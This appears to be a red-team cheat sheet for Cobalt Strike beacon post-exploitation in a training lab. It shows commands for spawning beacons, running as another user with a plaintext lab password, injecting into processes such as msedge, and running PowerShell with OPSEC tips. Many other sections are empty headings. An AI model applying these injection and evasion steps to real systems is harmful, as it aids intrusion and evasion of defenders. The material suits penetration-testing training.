githubEdit

Enumeration


Session Passing

Spawn New Beacon

# Create new process and inject shellcode (ensure listener exists)
spawn x64 http
spawn x86 http

Spawn as Another User

cd C:\Windows\Temp
spawnas INLANEFREIGHT\tmorgan Passw0rd! tcp-local

Process Migration

Stay in processes that SHOULD have network connections.

# Spawn windowless process to inject into
execute C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

# Inject into the process
inject <pid> x64 http

Host Enumeration

File System

Software and Services

Drives

Keylogger

Clipboard and Screenshot


Registry


Job Management


Program Execution

Command
Description

shell whoami /user

Passes to cmd.exe /c

run cmd.exe /c whoami

Executes program directly

powershell $env:computername

Direct PowerShell cmdlets

powerpick $env:computername

Unmanaged PowerShell (better OPSEC)

psinject 19508 x64 Get-ChildItem C:\

Inject PowerShell DLL into remote process

Import and Run Scripts

Execute .NET Assembly


AV Enumeration

Local

Remote (via WinRM)


LDAP Enumeration

SIDs

Domain Users

NEVER RUN (objectClass=*)

BOFHound Compatible Queries

Group Membership (Recursive)

Bitwise Filters

OID
Rule

1.2.840.113556.1.4.803

LDAP_MATCHING_RULE_BIT_AND

1.2.840.113556.1.4.804

LDAP_MATCHING_RULE_BIT_OR

1.2.840.113556.1.4.1941

LDAP_MATCHING_RULE_IN_CHAIN

Last updated